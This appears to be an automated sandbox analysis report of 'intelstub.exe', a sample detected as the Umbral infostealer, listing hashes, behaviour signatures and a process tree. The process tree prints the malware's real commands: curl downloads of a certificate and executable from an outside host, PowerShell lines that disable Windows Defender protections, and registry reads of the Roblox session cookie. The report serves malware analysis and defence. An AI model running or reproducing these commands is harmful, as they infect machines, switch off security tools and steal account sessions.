Resubmissions
08-12-2024 02:44
241208-c76qvsykax 1008-12-2024 02:42
241208-c7bwgstldm 1008-12-2024 02:40
241208-c6dcxstlal 1008-12-2024 02:37
241208-c4lxaaxrcv 10Analysis
-
max time kernel
35s -
max time network
37s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
08-12-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
intelstub.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
intelstub.exe
-
Size
45KB
-
MD5
46dad3f34a1ff25b259446bac02cca4a
-
SHA1
08be9e8701d40bb0d968106793480eeb25adeb26
-
SHA256
9bf776f889b56b90ef2cbe8cd971c68290f79374b7a7dcfa100e71a1cd45bd03
-
SHA512
67338468551bc926a88b8e40f40177dea339debd701ad463f9e2cb763cf82f755743f3ee82c3626aa326c820afb93020d0d9526fc38affcb9b3af92725b393f6
-
SSDEEP
768:R4yvRGAc8gygFxLgkzLQgzcOybPofSzVxsBKfwJlVE3iPmbL52:9c8Oxz8YcO+A6zV4Kfd7
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x002a00000004506c-13.dat family_umbral behavioral1/memory/768-15-0x000001E506B30000-0x000001E506B70000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2544 powershell.exe 2452 powershell.exe 2496 powershell.exe 1076 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 768 IntelSoftwareAssetManagerService.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ipinfo.io 22 ipinfo.io 23 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IME\zvcjd0.pfx curl.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3472 wmic.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3748 wmic.exe 3748 wmic.exe 3748 wmic.exe 3748 wmic.exe 768 IntelSoftwareAssetManagerService.exe 228 wmic.exe 228 wmic.exe 228 wmic.exe 228 wmic.exe 768 IntelSoftwareAssetManagerService.exe 2544 powershell.exe 2544 powershell.exe 2452 powershell.exe 2452 powershell.exe 2496 powershell.exe 2496 powershell.exe 2072 powershell.exe 2072 powershell.exe 4720 wmic.exe 4720 wmic.exe 4720 wmic.exe 4720 wmic.exe 4728 wmic.exe 4728 wmic.exe 4728 wmic.exe 4728 wmic.exe 1004 wmic.exe 1004 wmic.exe 1004 wmic.exe 1004 wmic.exe 1076 powershell.exe 1076 powershell.exe 3472 wmic.exe 3472 wmic.exe 3472 wmic.exe 3472 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3748 wmic.exe Token: SeSecurityPrivilege 3748 wmic.exe Token: SeTakeOwnershipPrivilege 3748 wmic.exe Token: SeLoadDriverPrivilege 3748 wmic.exe Token: SeSystemProfilePrivilege 3748 wmic.exe Token: SeSystemtimePrivilege 3748 wmic.exe Token: SeProfSingleProcessPrivilege 3748 wmic.exe Token: SeIncBasePriorityPrivilege 3748 wmic.exe Token: SeCreatePagefilePrivilege 3748 wmic.exe Token: SeBackupPrivilege 3748 wmic.exe Token: SeRestorePrivilege 3748 wmic.exe Token: SeShutdownPrivilege 3748 wmic.exe Token: SeDebugPrivilege 3748 wmic.exe Token: SeSystemEnvironmentPrivilege 3748 wmic.exe Token: SeRemoteShutdownPrivilege 3748 wmic.exe Token: SeUndockPrivilege 3748 wmic.exe Token: SeManageVolumePrivilege 3748 wmic.exe Token: 33 3748 wmic.exe Token: 34 3748 wmic.exe Token: 35 3748 wmic.exe Token: 36 3748 wmic.exe Token: SeIncreaseQuotaPrivilege 3748 wmic.exe Token: SeSecurityPrivilege 3748 wmic.exe Token: SeTakeOwnershipPrivilege 3748 wmic.exe Token: SeLoadDriverPrivilege 3748 wmic.exe Token: SeSystemProfilePrivilege 3748 wmic.exe Token: SeSystemtimePrivilege 3748 wmic.exe Token: SeProfSingleProcessPrivilege 3748 wmic.exe Token: SeIncBasePriorityPrivilege 3748 wmic.exe Token: SeCreatePagefilePrivilege 3748 wmic.exe Token: SeBackupPrivilege 3748 wmic.exe Token: SeRestorePrivilege 3748 wmic.exe Token: SeShutdownPrivilege 3748 wmic.exe Token: SeDebugPrivilege 3748 wmic.exe Token: SeSystemEnvironmentPrivilege 3748 wmic.exe Token: SeRemoteShutdownPrivilege 3748 wmic.exe Token: SeUndockPrivilege 3748 wmic.exe Token: SeManageVolumePrivilege 3748 wmic.exe Token: 33 3748 wmic.exe Token: 34 3748 wmic.exe Token: 35 3748 wmic.exe Token: 36 3748 wmic.exe Token: SeDebugPrivilege 768 IntelSoftwareAssetManagerService.exe Token: SeIncreaseQuotaPrivilege 228 wmic.exe Token: SeSecurityPrivilege 228 wmic.exe Token: SeTakeOwnershipPrivilege 228 wmic.exe Token: SeLoadDriverPrivilege 228 wmic.exe Token: SeSystemProfilePrivilege 228 wmic.exe Token: SeSystemtimePrivilege 228 wmic.exe Token: SeProfSingleProcessPrivilege 228 wmic.exe Token: SeIncBasePriorityPrivilege 228 wmic.exe Token: SeCreatePagefilePrivilege 228 wmic.exe Token: SeBackupPrivilege 228 wmic.exe Token: SeRestorePrivilege 228 wmic.exe Token: SeShutdownPrivilege 228 wmic.exe Token: SeDebugPrivilege 228 wmic.exe Token: SeSystemEnvironmentPrivilege 228 wmic.exe Token: SeRemoteShutdownPrivilege 228 wmic.exe Token: SeUndockPrivilege 228 wmic.exe Token: SeManageVolumePrivilege 228 wmic.exe Token: 33 228 wmic.exe Token: 34 228 wmic.exe Token: 35 228 wmic.exe Token: 36 228 wmic.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1632 wrote to memory of 1384 1632 intelstub.exe 83 PID 1632 wrote to memory of 1384 1632 intelstub.exe 83 PID 1384 wrote to memory of 560 1384 cmd.exe 84 PID 1384 wrote to memory of 560 1384 cmd.exe 84 PID 1632 wrote to memory of 4128 1632 intelstub.exe 85 PID 1632 wrote to memory of 4128 1632 intelstub.exe 85 PID 4128 wrote to memory of 828 4128 cmd.exe 86 PID 4128 wrote to memory of 828 4128 cmd.exe 86 PID 1632 wrote to memory of 3100 1632 intelstub.exe 87 PID 1632 wrote to memory of 3100 1632 intelstub.exe 87 PID 1632 wrote to memory of 3840 1632 intelstub.exe 88 PID 1632 wrote to memory of 3840 1632 intelstub.exe 88 PID 3840 wrote to memory of 772 3840 cmd.exe 89 PID 3840 wrote to memory of 772 3840 cmd.exe 89 PID 1632 wrote to memory of 2096 1632 intelstub.exe 90 PID 1632 wrote to memory of 2096 1632 intelstub.exe 90 PID 2096 wrote to memory of 768 2096 cmd.exe 91 PID 2096 wrote to memory of 768 2096 cmd.exe 91 PID 768 wrote to memory of 3748 768 IntelSoftwareAssetManagerService.exe 92 PID 768 wrote to memory of 3748 768 IntelSoftwareAssetManagerService.exe 92 PID 768 wrote to memory of 228 768 IntelSoftwareAssetManagerService.exe 97 PID 768 wrote to memory of 228 768 IntelSoftwareAssetManagerService.exe 97 PID 768 wrote to memory of 2544 768 IntelSoftwareAssetManagerService.exe 99 PID 768 wrote to memory of 2544 768 IntelSoftwareAssetManagerService.exe 99 PID 768 wrote to memory of 2452 768 IntelSoftwareAssetManagerService.exe 103 PID 768 wrote to memory of 2452 768 IntelSoftwareAssetManagerService.exe 103 PID 768 wrote to memory of 2496 768 IntelSoftwareAssetManagerService.exe 105 PID 768 wrote to memory of 2496 768 IntelSoftwareAssetManagerService.exe 105 PID 768 wrote to memory of 2072 768 IntelSoftwareAssetManagerService.exe 107 PID 768 wrote to memory of 2072 768 IntelSoftwareAssetManagerService.exe 107 PID 768 wrote to memory of 4720 768 IntelSoftwareAssetManagerService.exe 109 PID 768 wrote to memory of 4720 768 IntelSoftwareAssetManagerService.exe 109 PID 768 wrote to memory of 4728 768 IntelSoftwareAssetManagerService.exe 111 PID 768 wrote to memory of 4728 768 IntelSoftwareAssetManagerService.exe 111 PID 768 wrote to memory of 1004 768 IntelSoftwareAssetManagerService.exe 113 PID 768 wrote to memory of 1004 768 IntelSoftwareAssetManagerService.exe 113 PID 768 wrote to memory of 1076 768 IntelSoftwareAssetManagerService.exe 115 PID 768 wrote to memory of 1076 768 IntelSoftwareAssetManagerService.exe 115 PID 768 wrote to memory of 3472 768 IntelSoftwareAssetManagerService.exe 118 PID 768 wrote to memory of 3472 768 IntelSoftwareAssetManagerService.exe 118 -
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 4 curl/8.7.1 HTTP User-Agent header 15 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\intelstub.exe"C:\Users\Admin\AppData\Local\Temp\intelstub.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent2⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent3⤵
- Drops file in Windows directory
PID:560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport2⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\certutil.execertutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport3⤵PID:828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\IME\zvcjd0.pfx2⤵PID:3100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent2⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent3⤵PID:772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exeC:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2072
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1076
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3472
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
948B
MD5ce01b4c135dd9bad0f293ac2e8374aa1
SHA1993bb587f30064bbf10116a0e289dd31b8ca81a9
SHA25698759585e7397ef4ee48fe5a90af18a778608c72896870d7d32710b352c683e0
SHA512d42a46538672f3d45e1ad33d465d2da73c44b5b6114249581eec5129434db71e7ccf4c0f82a783e717fa052e0e22b71427a436ff3cbbaa4bab5da6894e464757
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD56751297b813056ee1524db77d90d1f2a
SHA12bb71c8bc5fa6454df2f9fcf2e3e827d7e644a75
SHA2564091eb635522e7a676f37e3a815002a736053c1293deb9f27e63b89304441210
SHA51271532b405d547f17335b816ebebd03f64d68b80f2356da7508f08dec9700750b0c30dc1c800ca4b8cf068822ef42c4c39b7ac1df612be107e45fffcb66e3d7ae
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
238KB
MD566574582c2e810055676407bdd671636
SHA171a07c0906e65524d6844aa0a65e90ee682eb6c5
SHA2565a05e0c1a7b22baaaa9268ef6f0d9a5524826fdc3871a59c5134f7354baa9346
SHA51204c5dc624009d1127319f0f32c137a4bab6b1aec10e3fd5fdad4372c8a09b8f894980834d6d0d5ee3920ccb3aa3d3e84fe6e1010b6b6dabdb6c20e2f047b5341
-
Filesize
2KB
MD5044c6ed5926cda780ca3506829585245
SHA1b958068c7f440fffd712e9a0704f5234537b22d4
SHA25621115f915d5e38fb38be88a627010d39cb7e4b0008854530e3a8fa117f45cfea
SHA5124d00d57e4f0e12c01d5455cf81f685b04b9446aa026b8579009a271dab5eacc298530625e995ff910a9cc6442392fd2098d517b86b7ad0f713f689324e5f0601